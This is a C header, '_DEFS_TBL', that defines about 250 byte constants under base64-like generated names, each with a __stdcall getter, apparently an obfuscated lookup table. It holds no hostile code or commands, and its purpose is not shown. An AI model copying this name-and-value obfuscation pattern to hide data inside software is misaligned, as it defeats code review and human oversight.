#ifndef _DEFS_TBL
#define _DEFS_TBL 1
static const uint8_t __MjM0NDQ4MjWx=0x23;
extern uint8_t __stdcall __MjM0NDQ4MjWx_g(){ return __MjM0NDQ4MjWx; };
static const uint8_t __NDQ0ODI1YjGv=0x44;
extern uint8_t __stdcall __NDQ0ODI1YjGv_g(){ return __NDQ0ODI1YjGv; };
static const uint8_t __NDgyNWIxYWZD=0x48;
extern uint8_t __stdcall __NDgyNWIxYWZD_g(){ return __NDgyNWIxYWZD; };
static const uint8_t __MjViMWFmNDNj=0x25;
extern uint8_t __stdcall __MjViMWFmNDNj_g(){ return __MjViMWFmNDNj; };
static const uint8_t __YjFhZjQzNjPD=0xB1;
extern uint8_t __stdcall __YjFhZjQzNjPD_g(){ return __YjFhZjQzNjPD; };
static const uint8_t __YWY0MzYzYzPZ=0xAF;
extern uint8_t __stdcall __YWY0MzYzYzPZ_g(){ return __YWY0MzYzYzPZ; };
static const uint8_t __NDM2M2MzZDk8=0x43;
extern uint8_t __stdcall __NDM2M2MzZDk8_g(){ return __NDM2M2MzZDk8; };
static const uint8_t __NjNjM2Q5M2PP=0x63;
extern uint8_t __stdcall __NjNjM2Q5M2PP_g(){ return __NjNjM2Q5M2PP; };
static const uint8_t __YzNkOTNjY2YW=0xC3;
extern uint8_t __stdcall __YzNkOTNjY2YW_g(){ return __YzNkOTNjY2YW; };
static const uint8_t __ZDkzY2NmMTZw=0xD9;
extern uint8_t __stdcall __ZDkzY2NmMTZw_g(){ return __ZDkzY2NmMTZw; };
static const uint8_t __M2NjZjE2NzDF=0x3C;
extern uint8_t __stdcall __M2NjZjE2NzDF_g(){ return __M2NjZjE2NzDF; };
static const uint8_t __Y2YxNjcwYzWB=0xCF;
extern uint8_t __stdcall __Y2YxNjcwYzWB_g(){ return __Y2YxNjcwYzWB; };
static const uint8_t __MTY3MGM1ODF6=0x16;
extern uint8_t __stdcall __MTY3MGM1ODF6_g(){ return __MTY3MGM1ODF6; };
static const uint8_t __NzBjNTgxN2FK=0x70;
extern uint8_t __stdcall __NzBjNTgxN2FK_g(){ return __NzBjNTgxN2FK; };
static const uint8_t __YzU4MTdhNGEr=0xC5;
extern uint8_t __stdcall __YzU4MTdhNGEr_g(){ return __YzU4MTdhNGEr; };
static const uint8_t __ODE3YTRhMmIg=0x81;
extern uint8_t __stdcall __ODE3YTRhMmIg_g(){ return __ODE3YTRhMmIg; };
static const uint8_t __N2E0YTJiMjAO=0x7A;
extern uint8_t __stdcall __N2E0YTJiMjAO_g(){ return __N2E0YTJiMjAO; };
static const uint8_t __NGEyYjIwMGWo=0x4A;
extern uint8_t __stdcall __NGEyYjIwMGWo_g(){ return __NGEyYjIwMGWo; };
static const uint8_t __MmIyMDBlYThW=0x2B;
extern uint8_t __stdcall __MmIyMDBlYThW_g(){ return __MmIyMDBlYThW; };
static const uint8_t __MjAwZWE4NTYm=0x20;
extern uint8_t __stdcall __MjAwZWE4NTYm_g(){ return __MjAwZWE4NTYm; };
static const uint8_t __MGVhODU2MjaE=0x0E;
extern uint8_t __stdcall __MGVhODU2MjaE_g(){ return __MGVhODU2MjaE; };
static const uint8_t __YTg1NjI2ODQk=0xA8;
extern uint8_t __stdcall __YTg1NjI2ODQk_g(){ return __YTg1NjI2ODQk; };
static const uint8_t __NTYyNjg0MjQY=0x56;
extern uint8_t __stdcall __NTYyNjg0MjQY_g(){ return __NTYyNjg0MjQY; };
static const uint8_t __MjY4NDI0MTjL=0x26;
extern uint8_t __stdcall __MjY4NDI0MTjL_g(){ return __MjY4NDI0MTjL; };
static const uint8_t __ODQyNDE4Y2KZ=0x84;
extern uint8_t __stdcall __ODQyNDE4Y2KZ_g(){ return __ODQyNDE4Y2KZ; };
static const uint8_t __MjQxOGNiOTlv=0x24;
extern uint8_t __stdcall __MjQxOGNiOTlv_g(){ return __MjQxOGNiOTlv; };
static const uint8_t __MThjYjk5Nmb4=0x18;
extern uint8_t __stdcall __MThjYjk5Nmb4_g(){ return __MThjYjk5Nmb4; };
static const uint8_t __Y2I5OTZmZjhQ=0xCB;
extern uint8_t __stdcall __Y2I5OTZmZjhQ_g(){ return __Y2I5OTZmZjhQ; };
static const uint8_t __OTk2ZmY4NTBH=0x99;
extern uint8_t __stdcall __OTk2ZmY4NTBH_g(){ return __OTk2ZmY4NTBH; };
static const uint8_t __NmZmODUwNDel=0x6F;
extern uint8_t __stdcall __NmZmODUwNDel_g(){ return __NmZmODUwNDel; };
static const uint8_t __Zjg1MDQ3YTWA=0xF8;
extern uint8_t __stdcall __Zjg1MDQ3YTWA_g(){ return __Zjg1MDQ3YTWA; };
static const uint8_t __NTA0N2E1ODCO=0x50;
extern uint8_t __stdcall __NTA0N2E1ODCO_g(){ return __NTA0N2E1ODCO; };
static const uint8_t __NDdhNTgwOGW6=0x47;
extern uint8_t __stdcall __NDdhNTgwOGW6_g(){ return __NDdhNTgwOGW6; };
static const uint8_t __YTU4MDhlYmFX=0xA5;
extern uint8_t __stdcall __YTU4MDhlYmFX_g(){ return __YTU4MDhlYmFX; };
static const uint8_t __ODA4ZWJhNTeK=0x80;
extern uint8_t __stdcall __ODA4ZWJhNTeK_g(){ return __ODA4ZWJhNTeK; };
static const uint8_t __OGViYTU3OGFh=0x8E;
extern uint8_t __stdcall __OGViYTU3OGFh_g(){ return __OGViYTU3OGFh; };
static const uint8_t __YmE1NzhhNjHl=0xBA;
extern uint8_t __stdcall __YmE1NzhhNjHl_g(){ return __YmE1NzhhNjHl; };
static const uint8_t __NTc4YTYxZTV_=0x57;
extern uint8_t __stdcall __NTc4YTYxZTV__g(){ return __NTc4YTYxZTV_; };
static const uint8_t __OGE2MWU1N2Wp=0x8A;
extern uint8_t __stdcall __OGE2MWU1N2Wp_g(){ return __OGE2MWU1N2Wp; };
static const uint8_t __NjFlNTdlYTk0=0x61;
extern uint8_t __stdcall __NjFlNTdlYTk0_g(){ return __NjFlNTdlYTk0; };
static const uint8_t __ZTU3ZWE5MzRY=0xE5;
extern uint8_t __stdcall __ZTU3ZWE5MzRY_g(){ return __ZTU3ZWE5MzRY; };
static const uint8_t __N2VhOTM0NTgT=0x7E;
extern uint8_t __stdcall __N2VhOTM0NTgT_g(){ return __N2VhOTM0NTgT; };
static const uint8_t __YTkzNDU4MTO_=0xA9;
extern uint8_t __stdcall __YTkzNDU4MTO__g(){ return __YTkzNDU4MTO_; };
static const uint8_t __MzQ1ODEzYmXs=0x34;
extern uint8_t __stdcall __MzQ1ODEzYmXs_g(){ return __MzQ1ODEzYmXs; };
static const uint8_t __NTgxM2JlZWN3=0x58;
extern uint8_t __stdcall __NTgxM2JlZWN3_g(){ return __NTgxM2JlZWN3; };
static const uint8_t __MTNiZWVjNzfb=0x13;
extern uint8_t __stdcall __MTNiZWVjNzfb_g(){ return __MTNiZWVjNzfb; };
static const uint8_t __YmVlYzc3ZGK0=0xBE;
extern uint8_t __stdcall __YmVlYzc3ZGK0_g(){ return __YmVlYzc3ZGK0; };
static const uint8_t __ZWM3N2RiYjQD=0xEC;
extern uint8_t __stdcall __ZWM3N2RiYjQD_g(){ return __ZWM3N2RiYjQD; };
static const uint8_t __NzdkYmI0MDNM=0x77;
extern uint8_t __stdcall __NzdkYmI0MDNM_g(){ return __NzdkYmI0MDNM; };
static const uint8_t __ZGJiNDAzNGMh=0xDB;
extern uint8_t __stdcall __ZGJiNDAzNGMh_g(){ return __ZGJiNDAzNGMh; };
static const uint8_t __YjQwMzRjMjHX=0xB4;
extern uint8_t __stdcall __YjQwMzRjMjHX_g(){ return __YjQwMzRjMjHX; };
static const uint8_t __MDM0YzIxZDce=0x03;
extern uint8_t __stdcall __MDM0YzIxZDce_g(){ return __MDM0YzIxZDce; };
static const uint8_t __NGMyMWQ3MWXw=0x4C;
extern uint8_t __stdcall __NGMyMWQ3MWXw_g(){ return __NGMyMWQ3MWXw; };
static const uint8_t __MjFkNzFlZjDA=0x21;
extern uint8_t __stdcall __MjFkNzFlZjDA_g(){ return __MjFkNzFlZjDA; };
static const uint8_t __ZDcxZWYwYzA1=0xD7;
extern uint8_t __stdcall __ZDcxZWYwYzA1_g(){ return __ZDcxZWYwYzA1; };
static const uint8_t __MWVmMGMwMzUp=0x1E;
extern uint8_t __stdcall __MWVmMGMwMzUp_g(){ return __MWVmMGMwMzUp; };
static const uint8_t __ZjBjMDM1Mjl9=0xF0;
extern uint8_t __stdcall __ZjBjMDM1Mjl9_g(){ return __ZjBjMDM1Mjl9; };
static const uint8_t __YzAzNTI5N2Tc=0xC0;
extern uint8_t __stdcall __YzAzNTI5N2Tc_g(){ return __YzAzNTI5N2Tc; };
static const uint8_t __MzUyOTdkZGN4=0x35;
extern uint8_t __stdcall __MzUyOTdkZGN4_g(){ return __MzUyOTdkZGN4; };
static const uint8_t __Mjk3ZGRjNziQ=0x29;
extern uint8_t __stdcall __Mjk3ZGRjNziQ_g(){ return __Mjk3ZGRjNziQ; };
static const uint8_t __N2RkYzc4OTC9=0x7D;
extern uint8_t __stdcall __N2RkYzc4OTC9_g(){ return __N2RkYzc4OTC9; };
static const uint8_t __ZGM3ODkwYmQs=0xDC;
extern uint8_t __stdcall __ZGM3ODkwYmQs_g(){ return __ZGM3ODkwYmQs; };
static const uint8_t __Nzg5MGJkMmNG=0x78;
extern uint8_t __stdcall __Nzg5MGJkMmNG_g(){ return __Nzg5MGJkMmNG; };
static const uint8_t __OTBiZDJjNDbx=0x90;
extern uint8_t __stdcall __OTBiZDJjNDbx_g(){ return __OTBiZDJjNDbx; };
static const uint8_t __YmQyYzQ2ZjFF=0xBD;
extern uint8_t __stdcall __YmQyYzQ2ZjFF_g(){ return __YmQyYzQ2ZjFF; };
static const uint8_t __MmM0NmYxNDX_=0x2C;
extern uint8_t __stdcall __MmM0NmYxNDX__g(){ return __MmM0NmYxNDX_; };
static const uint8_t __NDZmMTQ1ZmbU=0x46;
extern uint8_t __stdcall __NDZmMTQ1ZmbU_g(){ return __NDZmMTQ1ZmbU; };
static const uint8_t __ZjE0NWZmZDQJ=0xF1;
extern uint8_t __stdcall __ZjE0NWZmZDQJ_g(){ return __ZjE0NWZmZDQJ; };
static const uint8_t __NDVmZmQ0MDmy=0x45;
extern uint8_t __stdcall __NDVmZmQ0MDmy_g(){ return __NDVmZmQ0MDmy; };
static const uint8_t __ZmZkNDA5YjKz=0xFF;
extern uint8_t __stdcall __ZmZkNDA5YjKz_g(){ return __ZmZkNDA5YjKz; };
static const uint8_t __ZDQwOWIyYjP1=0xD4;
extern uint8_t __stdcall __ZDQwOWIyYjP1_g(){ return __ZDQwOWIyYjP1; };
static const uint8_t __MDliMmIzZjVP=0x09;
extern uint8_t __stdcall __MDliMmIzZjVP_g(){ return __MDliMmIzZjVP; };
static const uint8_t __YjJiM2Y1NGbK=0xB2;
extern uint8_t __stdcall __YjJiM2Y1NGbK_g(){ return __YjJiM2Y1NGbK; };
static const uint8_t __YjNmNTRmY2E6=0xB3;
extern uint8_t __stdcall __YjNmNTRmY2E6_g(){ return __YjNmNTRmY2E6; };
static const uint8_t __ZjU0ZmNhM2HV=0xF5;
extern uint8_t __stdcall __ZjU0ZmNhM2HV_g(){ return __ZjU0ZmNhM2HV; };
static const uint8_t __NGZjYTNhZDV0=0x4F;
extern uint8_t __stdcall __NGZjYTNhZDV0_g(){ return __NGZjYTNhZDV0; };
static const uint8_t __Y2EzYWQ1NzSH=0xCA;
extern uint8_t __stdcall __Y2EzYWQ1NzSH_g(){ return __Y2EzYWQ1NzSH; };
static const uint8_t __M2FkNTc0ODeq=0x3A;
extern uint8_t __stdcall __M2FkNTc0ODeq_g(){ return __M2FkNTc0ODeq; };
static const uint8_t __ZDU3NDg3YWFu=0xD5;
extern uint8_t __stdcall __ZDU3NDg3YWFu_g(){ return __ZDU3NDg3YWFu; };
static const uint8_t __NzQ4N2FhNmVU=0x74;
extern uint8_t __stdcall __NzQ4N2FhNmVU_g(){ return __NzQ4N2FhNmVU; };
static const uint8_t __ODdhYTZlNTQR=0x87;
extern uint8_t __stdcall __ODdhYTZlNTQR_g(){ return __ODdhYTZlNTQR; };
static const uint8_t __YWE2ZTU0MTGw=0xAA;
extern uint8_t __stdcall __YWE2ZTU0MTGw_g(){ return __YWE2ZTU0MTGw; };
static const uint8_t __NmU1NDExYjAC=0x6E;
extern uint8_t __stdcall __NmU1NDExYjAC_g(){ return __NmU1NDExYjAC; };
static const uint8_t __NTQxMWIwMDJ_=0x54;
extern uint8_t __stdcall __NTQxMWIwMDJ__g(){ return __NTQxMWIwMDJ_; };
static const uint8_t __MTFiMDAyN2as=0x11;
extern uint8_t __stdcall __MTFiMDAyN2as_g(){ return __MTFiMDAyN2as; };
static const uint8_t __YjAwMjdmYWPY=0xB0;
extern uint8_t __stdcall __YjAwMjdmYWPY_g(){ return __YjAwMjdmYWPY; };
static const uint8_t __MDI3ZmFjZDhl=0x02;
extern uint8_t __stdcall __MDI3ZmFjZDhl_g(){ return __MDI3ZmFjZDhl; };
static const uint8_t __N2ZhY2Q4NjUL=0x7F;
extern uint8_t __stdcall __N2ZhY2Q4NjUL_g(){ return __N2ZhY2Q4NjUL; };
static const uint8_t __YWNkODY1MGIP=0xAC;
extern uint8_t __stdcall __YWNkODY1MGIP_g(){ return __YWNkODY1MGIP; };
static const uint8_t __ZDg2NTBiMGaN=0xD8;
extern uint8_t __stdcall __ZDg2NTBiMGaN_g(){ return __ZDg2NTBiMGaN; };
static const uint8_t __NjUwYjBmOGQc=0x65;
extern uint8_t __stdcall __NjUwYjBmOGQc_g(){ return __NjUwYjBmOGQc; };
static const uint8_t __MGIwZjhkMWNk=0x0B;
extern uint8_t __stdcall __MGIwZjhkMWNk_g(){ return __MGIwZjhkMWNk; };
static const uint8_t __MGY4ZDFjNjRO=0x0F;
extern uint8_t __stdcall __MGY4ZDFjNjRO_g(){ return __MGY4ZDFjNjRO; };
static const uint8_t __OGQxYzY0NGV8=0x8D;
extern uint8_t __stdcall __OGQxYzY0NGV8_g(){ return __OGQxYzY0NGV8; };
static const uint8_t __MWM2NDRlN2MQ=0x1C;
extern uint8_t __stdcall __MWM2NDRlN2MQ_g(){ return __MWM2NDRlN2MQ; };
static const uint8_t __NjQ0ZTdjMTCP=0x64;
extern uint8_t __stdcall __NjQ0ZTdjMTCP_g(){ return __NjQ0ZTdjMTCP; };
static const uint8_t __NGU3YzEwOGbH=0x4E;
extern uint8_t __stdcall __NGU3YzEwOGbH_g(){ return __NGU3YzEwOGbH; };
static const uint8_t __N2MxMDhmYzfp=0x7C;
extern uint8_t __stdcall __N2MxMDhmYzfp_g(){ return __N2MxMDhmYzfp; };
static const uint8_t __MTA4ZmM3ZTlb=0x10;
extern uint8_t __stdcall __MTA4ZmM3ZTlb_g(){ return __MTA4ZmM3ZTlb; };
static const uint8_t __OGZjN2U5NWJC=0x8F;
extern uint8_t __stdcall __OGZjN2U5NWJC_g(){ return __OGZjN2U5NWJC; };
static const uint8_t __YzdlOTViNDK8=0xC7;
extern uint8_t __stdcall __YzdlOTViNDK8_g(){ return __YzdlOTViNDK8; };
static const uint8_t __ZTk1YjQyYmM_=0xE9;
extern uint8_t __stdcall __ZTk1YjQyYmM__g(){ return __ZTk1YjQyYmM_; };
static const uint8_t __NWI0MmJjM2Wi=0x5B;
extern uint8_t __stdcall __NWI0MmJjM2Wi_g(){ return __NWI0MmJjM2Wi; };
static const uint8_t __NDJiYzNlYTJs=0x42;
extern uint8_t __stdcall __NDJiYzNlYTJs_g(){ return __NDJiYzNlYTJs; };
static const uint8_t __YmMzZWEyNmM4=0xBC;
extern uint8_t __stdcall __YmMzZWEyNmM4_g(){ return __YmMzZWEyNmM4; };
static const uint8_t __M2VhMjZjMzi_=0x3E;
extern uint8_t __stdcall __M2VhMjZjMzi__g(){ return __M2VhMjZjMzi_; };
static const uint8_t __YTI2YzM4YmaV=0xA2;
extern uint8_t __stdcall __YTI2YzM4YmaV_g(){ return __YTI2YzM4YmaV; };
static const uint8_t __NmMzOGJmOTWY=0x6C;
extern uint8_t __stdcall __NmMzOGJmOTWY_g(){ return __NmMzOGJmOTWY; };
static const uint8_t __MzhiZjk1OThg=0x38;
extern uint8_t __stdcall __MzhiZjk1OThg_g(){ return __MzhiZjk1OThg; };
static const uint8_t __YmY5NTk4NjAi=0xBF;
extern uint8_t __stdcall __YmY5NTk4NjAi_g(){ return __YmY5NTk4NjAi; };
static const uint8_t __OTU5ODYwMjIw=0x95;
extern uint8_t __stdcall __OTU5ODYwMjIw_g(){ return __OTU5ODYwMjIw; };
static const uint8_t __OTg2MDIyMzD2=0x98;
extern uint8_t __stdcall __OTg2MDIyMzD2_g(){ return __OTg2MDIyMzD2; };
static const uint8_t __NjAyMjMwZjbT=0x60;
extern uint8_t __stdcall __NjAyMjMwZjbT_g(){ return __NjAyMjMwZjbT; };
static const uint8_t __MjIzMGY2ZDMN=0x22;
extern uint8_t __stdcall __MjIzMGY2ZDMN_g(){ return __MjIzMGY2ZDMN; };
static const uint8_t __MzBmNmQzMGTW=0x30;
extern uint8_t __stdcall __MzBmNmQzMGTW_g(){ return __MzBmNmQzMGTW; };
static const uint8_t __ZjZkMzBkZDZT=0xF6;
extern uint8_t __stdcall __ZjZkMzBkZDZT_g(){ return __ZjZkMzBkZDZT; };
static const uint8_t __ZDMwZGQ2NTNe=0xD3;
extern uint8_t __stdcall __ZDMwZGQ2NTNe_g(){ return __ZDMwZGQ2NTNe; };
static const uint8_t __MGRkNjUzNWX7=0x0D;
extern uint8_t __stdcall __MGRkNjUzNWX7_g(){ return __MGRkNjUzNWX7; };
static const uint8_t __ZDY1MzVlZmLy=0xD6;
extern uint8_t __stdcall __ZDY1MzVlZmLy_g(){ return __ZDY1MzVlZmLy; };
static const uint8_t __NTM1ZWZiZjKk=0x53;
extern uint8_t __stdcall __NTM1ZWZiZjKk_g(){ return __NTM1ZWZiZjKk; };
static const uint8_t __NWVmYmYyYTTS=0x5E;
extern uint8_t __stdcall __NWVmYmYyYTTS_g(){ return __NWVmYmYyYTTS; };
static const uint8_t __ZmJmMmE0ZDLj=0xFB;
extern uint8_t __stdcall __ZmJmMmE0ZDLj_g(){ return __ZmJmMmE0ZDLj; };
static const uint8_t __ZjJhNGQyZTPo=0xF2;
extern uint8_t __stdcall __ZjJhNGQyZTPo_g(){ return __ZjJhNGQyZTPo; };
static const uint8_t __YTRkMmUzZTiL=0xA4;
extern uint8_t __stdcall __YTRkMmUzZTiL_g(){ return __YTRkMmUzZTiL; };
static const uint8_t __ZDJlM2U4OGLa=0xD2;
extern uint8_t __stdcall __ZDJlM2U4OGLa_g(){ return __ZDJlM2U4OGLa; };
static const uint8_t __ZTNlODhiZGES=0xE3;
extern uint8_t __stdcall __ZTNlODhiZGES_g(){ return __ZTNlODhiZGES; };
static const uint8_t __ZTg4YmRhMTKX=0xE8;
extern uint8_t __stdcall __ZTg4YmRhMTKX_g(){ return __ZTg4YmRhMTKX; };
static const uint8_t __OGJkYTEyOTfC=0x8B;
extern uint8_t __stdcall __OGJkYTEyOTfC_g(){ return __OGJkYTEyOTfC; };
static const uint8_t __ZGExMjk3YzKU=0xDA;
extern uint8_t __stdcall __ZGExMjk3YzKU_g(){ return __ZGExMjk3YzKU; };
static const uint8_t __MTI5N2MyOTTq=0x12;
extern uint8_t __stdcall __MTI5N2MyOTTq_g(){ return __MTI5N2MyOTTq; };
static const uint8_t __OTdjMjk0ZWGW=0x97;
extern uint8_t __stdcall __OTdjMjk0ZWGW_g(){ return __OTdjMjk0ZWGW; };
static const uint8_t __YzI5NGVhOTZZ=0xC2;
extern uint8_t __stdcall __YzI5NGVhOTZZ_g(){ return __YzI5NGVhOTZZ; };
static const uint8_t __OTRlYTk2NTmM=0x94;
extern uint8_t __stdcall __OTRlYTk2NTmM_g(){ return __OTRlYTk2NTmM; };
static const uint8_t __ZWE5NjU5OGNf=0xEA;
extern uint8_t __stdcall __ZWE5NjU5OGNf_g(){ return __ZWE5NjU5OGNf; };
static const uint8_t __OTY1OThjNWZm=0x96;
extern uint8_t __stdcall __OTY1OThjNWZm_g(){ return __OTY1OThjNWZm; };
static const uint8_t __NTk4YzVmNjZR=0x59;
extern uint8_t __stdcall __NTk4YzVmNjZR_g(){ return __NTk4YzVmNjZR; };
static const uint8_t __OGM1ZjY2NTGr=0x8C;
extern uint8_t __stdcall __OGM1ZjY2NTGr_g(){ return __OGM1ZjY2NTGr; };
static const uint8_t __NWY2NjUxYWJx=0x5F;
extern uint8_t __stdcall __NWY2NjUxYWJx_g(){ return __NWY2NjUxYWJx; };
static const uint8_t __NjY1MWFiNzGJ=0x66;
extern uint8_t __stdcall __NjY1MWFiNzGJ_g(){ return __NjY1MWFiNzGJ; };
static const uint8_t __NTFhYjcxODlz=0x51;
extern uint8_t __stdcall __NTFhYjcxODlz_g(){ return __NTFhYjcxODlz; };
static const uint8_t __YWI3MTg5NzM_=0xAB;
extern uint8_t __stdcall __YWI3MTg5NzM__g(){ return __YWI3MTg5NzM_; };
static const uint8_t __NzE4OTczM2bt=0x71;
extern uint8_t __stdcall __NzE4OTczM2bt_g(){ return __NzE4OTczM2bt; };
static const uint8_t __ODk3MzNmZWSI=0x89;
extern uint8_t __stdcall __ODk3MzNmZWSI_g(){ return __ODk3MzNmZWSI; };
static const uint8_t __NzMzZmVkODgB=0x73;
extern uint8_t __stdcall __NzMzZmVkODgB_g(){ return __NzMzZmVkODgB; };
static const uint8_t __M2ZlZDg4MDHm=0x3F;
extern uint8_t __stdcall __M2ZlZDg4MDHm_g(){ return __M2ZlZDg4MDHm; };
static const uint8_t __ZWQ4ODAxZTY5=0xED;
extern uint8_t __stdcall __ZWQ4ODAxZTY5_g(){ return __ZWQ4ODAxZTY5; };
static const uint8_t __ODgwMWU2MzkI=0x88;
extern uint8_t __stdcall __ODgwMWU2MzkI_g(){ return __ODgwMWU2MzkI; };
static const uint8_t __MDFlNjM5MDh1=0x01;
extern uint8_t __stdcall __MDFlNjM5MDh1_g(){ return __MDFlNjM5MDh1; };
static const uint8_t __ZTYzOTA4NzXg=0xE6;
extern uint8_t __stdcall __ZTYzOTA4NzXg_g(){ return __ZTYzOTA4NzXg; };
static const uint8_t __MzkwODc1ZTDO=0x39;
extern uint8_t __stdcall __MzkwODc1ZTDO_g(){ return __MzkwODc1ZTDO; };
static const uint8_t __MDg3NWUwY2Xz=0x08;
extern uint8_t __stdcall __MDg3NWUwY2Xz_g(){ return __MDg3NWUwY2Xz; };
static const uint8_t __NzVlMGNlZjPR=0x75;
extern uint8_t __stdcall __NzVlMGNlZjPR_g(){ return __NzVlMGNlZjPR; };
static const uint8_t __ZTBjZWYzZDFp=0xE0;
extern uint8_t __stdcall __ZTBjZWYzZDFp_g(){ return __ZTBjZWYzZDFp; };
static const uint8_t __Y2VmM2QxNjlV=0xCE;
extern uint8_t __stdcall __Y2VmM2QxNjlV_g(){ return __Y2VmM2QxNjlV; };
static const uint8_t __ZjNkMTY5NTUq=0xF3;
extern uint8_t __stdcall __ZjNkMTY5NTUq_g(){ return __ZjNkMTY5NTUq; };
static const uint8_t __ZDE2OTU1MmHM=0xD1;
extern uint8_t __stdcall __ZDE2OTU1MmHM_g(){ return __ZDE2OTU1MmHM; };
static const uint8_t __Njk1NTJhY2No=0x69;
extern uint8_t __stdcall __Njk1NTJhY2No_g(){ return __Njk1NTJhY2No; };
static const uint8_t __NTUyYWNjNjhL=0x55;
extern uint8_t __stdcall __NTUyYWNjNjhL_g(){ return __NTUyYWNjNjhL; };
static const uint8_t __MmFjYzY4NGLi=0x2A;
extern uint8_t __stdcall __MmFjYzY4NGLi_g(){ return __MmFjYzY4NGLi; };
static const uint8_t __Y2M2ODRiZTLr=0xCC;
extern uint8_t __stdcall __Y2M2ODRiZTLr_g(){ return __Y2M2ODRiZTLr; };
static const uint8_t __Njg0YmUyZWKu=0x68;
extern uint8_t __stdcall __Njg0YmUyZWKu_g(){ return __Njg0YmUyZWKu; };
static const uint8_t __NGJlMmViYWXB=0x4B;
extern uint8_t __stdcall __NGJlMmViYWXB_g(){ return __NGJlMmViYWXB; };
static const uint8_t __ZTJlYmFlYzFS=0xE2;
extern uint8_t __stdcall __ZTJlYmFlYzFS_g(){ return __ZTJlYmFlYzFS; };
static const uint8_t __ZWJhZWMxNTIf=0xEB;
extern uint8_t __stdcall __ZWJhZWMxNTIf_g(){ return __ZWJhZWMxNTIf; };
static const uint8_t __YWVjMTUyMWb6=0xAE;
extern uint8_t __stdcall __YWVjMTUyMWb6_g(){ return __YWVjMTUyMWb6; };
static const uint8_t __YzE1MjFmZmHh=0xC1;
extern uint8_t __stdcall __YzE1MjFmZmHh_g(){ return __YzE1MjFmZmHh; };
static const uint8_t __NTIxZmZhZTEK=0x52;
extern uint8_t __stdcall __NTIxZmZhZTEK_g(){ return __NTIxZmZhZTEK; };
static const uint8_t __MWZmYWUxMGEd=0x1F;
extern uint8_t __stdcall __MWZmYWUxMGEd_g(){ return __MWZmYWUxMGEd; };
static const uint8_t __ZmFlMTBhMWSD=0xFA;
extern uint8_t __stdcall __ZmFlMTBhMWSD_g(){ return __ZmFlMTBhMWSD; };
static const uint8_t __ZTEwYTFkODP9=0xE1;
extern uint8_t __stdcall __ZTEwYTFkODP9_g(){ return __ZTEwYTFkODP9; };
static const uint8_t __MGExZDgzZmS3=0x0A;
extern uint8_t __stdcall __MGExZDgzZmS3_g(){ return __MGExZDgzZmS3; };
static const uint8_t __MWQ4M2ZkYjed=0x1D;
extern uint8_t __stdcall __MWQ4M2ZkYjed_g(){ return __MWQ4M2ZkYjed; };
static const uint8_t __ODNmZGI3OWTu=0x83;
extern uint8_t __stdcall __ODNmZGI3OWTu_g(){ return __ODNmZGI3OWTu; };
static const uint8_t __ZmRiNzlkZWXQ=0xFD;
extern uint8_t __stdcall __ZmRiNzlkZWXQ_g(){ return __ZmRiNzlkZWXQ; };
static const uint8_t __Yjc5ZGVlZDCf=0xB7;
extern uint8_t __stdcall __Yjc5ZGVlZDCf_g(){ return __Yjc5ZGVlZDCf; };
static const uint8_t __OWRlZWQwOWaa=0x9D;
extern uint8_t __stdcall __OWRlZWQwOWaa_g(){ return __OWRlZWQwOWaa; };
static const uint8_t __ZWVkMDlmOWEH=0xEE;
extern uint8_t __stdcall __ZWVkMDlmOWEH_g(){ return __ZWVkMDlmOWEH; };
static const uint8_t __ZDA5ZjlhMDf8=0xD0;
extern uint8_t __stdcall __ZDA5ZjlhMDf8_g(){ return __ZDA5ZjlhMDf8; };
static const uint8_t __OWY5YTA3ZmMG=0x9F;
extern uint8_t __stdcall __OWY5YTA3ZmMG_g(){ return __OWY5YTA3ZmMG; };
static const uint8_t __OWEwN2ZjMDam=0x9A;
extern uint8_t __stdcall __OWEwN2ZjMDam_g(){ return __OWEwN2ZjMDam; };
static const uint8_t __MDdmYzA2YTb3=0x07;
extern uint8_t __stdcall __MDdmYzA2YTb3_g(){ return __MDdmYzA2YTb3; };
static const uint8_t __ZmMwNmE2Zjej=0xFC;
extern uint8_t __stdcall __ZmMwNmE2Zjej_g(){ return __ZmMwNmE2Zjej; };
static const uint8_t __MDZhNmY3YTOT=0x06;
extern uint8_t __stdcall __MDZhNmY3YTOT_g(){ return __MDZhNmY3YTOT; };
static const uint8_t __YTZmN2EzOTME=0xA6;
extern uint8_t __stdcall __YTZmN2EzOTME_g(){ return __YTZmN2EzOTME; };
static const uint8_t __ZjdhMzkzMDQU=0xF7;
extern uint8_t __stdcall __ZjdhMzkzMDQU_g(){ return __ZjdhMzkzMDQU; };
static const uint8_t __YTM5MzA0MTRc=0xA3;
extern uint8_t __stdcall __YTM5MzA0MTRc_g(){ return __YTM5MzA0MTRc; };
static const uint8_t __OTMwNDE0NWPG=0x93;
extern uint8_t __stdcall __OTMwNDE0NWPG_g(){ return __OTMwNDE0NWPG; };
static const uint8_t __MDQxNDVjYzY7=0x04;
extern uint8_t __stdcall __MDQxNDVjYzY7_g(){ return __MDQxNDVjYzY7; };
static const uint8_t __MTQ1Y2M2M2I3=0x14;
extern uint8_t __stdcall __MTQ1Y2M2M2I3_g(){ return __MTQ1Y2M2M2I3; };
static const uint8_t __NWNjNjNiMzfd=0x5C;
extern uint8_t __stdcall __NWNjNjNiMzfd_g(){ return __NWNjNjNiMzfd; };
static const uint8_t __YzYzYjM3ZGQv=0xC6;
extern uint8_t __stdcall __YzYzYjM3ZGQv_g(){ return __YzYzYjM3ZGQv; };
static const uint8_t __M2IzN2RkMman=0x3B;
extern uint8_t __stdcall __M2IzN2RkMman_g(){ return __M2IzN2RkMman; };
static const uint8_t __MzdkZDJmYTeF=0x37;
extern uint8_t __stdcall __MzdkZDJmYTeF_g(){ return __MzdkZDJmYTeF; };
static const uint8_t __ZGQyZmE3ODVn=0xDD;
extern uint8_t __stdcall __ZGQyZmE3ODVn_g(){ return __ZGQyZmE3ODVn; };
static const uint8_t __MmZhNzg1Njct=0x2F;
extern uint8_t __stdcall __MmZhNzg1Njct_g(){ return __MmZhNzg1Njct; };
static const uint8_t __YTc4NTY3MmQX=0xA7;
extern uint8_t __stdcall __YTc4NTY3MmQX_g(){ return __YTc4NTY3MmQX; };
static const uint8_t __ODU2NzJkMTfI=0x85;
extern uint8_t __stdcall __ODU2NzJkMTfI_g(){ return __ODU2NzJkMTfI; };
static const uint8_t __NjcyZDE3Yzie=0x67;
extern uint8_t __stdcall __NjcyZDE3Yzie_g(){ return __NjcyZDE3Yzie; };
static const uint8_t __MmQxN2M4OWUa=0x2D;
extern uint8_t __stdcall __MmQxN2M4OWUa_g(){ return __MmQxN2M4OWUa; };
static const uint8_t __MTdjODllMWFN=0x17;
extern uint8_t __stdcall __MTdjODllMWFN_g(){ return __MTdjODllMWFN; };
